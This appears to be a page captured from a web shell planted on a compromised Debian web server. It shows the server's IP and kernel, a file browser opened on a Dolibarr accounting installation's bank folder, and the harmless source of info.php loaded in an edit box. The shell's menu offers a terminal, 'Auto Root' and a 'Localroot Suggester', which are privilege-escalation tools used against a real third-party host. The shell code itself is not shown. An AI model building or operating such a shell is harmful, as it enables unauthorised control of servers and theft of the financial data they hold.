Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
btm2000_old /
htdocs /
compta /
bank /
Delete
Unzip
Name
Size
Permission
Date
Action
class
[ DIR ]
drwxr-xr-x
2021-10-16 13:26
various_payment
[ DIR ]
drwxr-xr-x
2021-10-16 13:26
account_statement_document.php
6.95
KB
-rw-r--r--
2021-10-16 13:26
annuel.php
14.57
KB
-rw-r--r--
2021-10-16 13:26
bankentries_list.php
65.01
KB
-rw-r--r--
2021-10-16 13:26
bilan.php
2.64
KB
-rw-r--r--
2021-10-16 13:26
budget.php
3.24
KB
-rw-r--r--
2021-10-16 13:26
card.php
38.75
KB
-rw-r--r--
2021-10-16 13:26
categ.php
5.1
KB
-rw-r--r--
2021-10-16 13:26
document.php
4.42
KB
-rw-r--r--
2021-10-16 13:26
graph.php
26.13
KB
-rw-r--r--
2021-10-16 13:26
index.html
1
B
-rw-r--r--
2021-10-16 13:26
info.php
2.07
KB
-rw-r--r--
2021-10-16 13:26
line.php
22.42
KB
-rw-r--r--
2021-10-16 13:26
list.php
24.82
KB
-rw-r--r--
2021-10-16 13:26
releve.php
23.81
KB
-rw-r--r--
2021-10-16 13:26
transfer.php
9.38
KB
-rw-r--r--
2021-10-16 13:26
treso.php
11.55
KB
-rw-r--r--
2021-10-16 13:26
Save
Rename
<?php /* Copyright (C) 2005-2010 Laurent Destailleur <eldy@users.sourceforge.net> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/compta/bank/info.php * \ingroup banque * \brief Onglet info d'une ecriture bancaire */ require '../../main.inc.php'; require_once DOL_DOCUMENT_ROOT.'/core/lib/functions2.lib.php'; require_once DOL_DOCUMENT_ROOT.'/compta/paiement/class/paiement.class.php'; require_once DOL_DOCUMENT_ROOT.'/compta/bank/class/account.class.php'; // Load translation files required by the page $langs->loadLangs(array('banks', 'categories', 'companies')); $id = GETPOST("rowid", 'int'); /* * View */ llxHeader(); $object = new AccountLine($db); $object->fetch($id); $object->info($id); $h = 0; $head[$h][0] = DOL_URL_ROOT.'/compta/bank/line.php?rowid='.$id; $head[$h][1] = $langs->trans("BankTransaction"); $h++; $head[$h][0] = DOL_URL_ROOT.'/compta/bank/info.php?rowid='.$id; $head[$h][1] = $langs->trans("Info"); $hselected = $h; $h++; print dol_get_fiche_head($head, $hselected, $langs->trans("LineRecord"), -1, 'accountline'); $linkback = '<a href="'.DOL_URL_ROOT.'/compta/bank/bankentries_list.php?restore_lastsearch_values=1">'.$langs->trans("BackToList").'</a>'; dol_banner_tab($object, 'rowid', $linkback); print '<div class="underbanner clearboth"></div>'; print '<br>'; print '<table width="100%"><tr><td>'; dol_print_object_info($object); print '</td></tr></table>'; print '</div>'; // End of page llxFooter(); $db->close();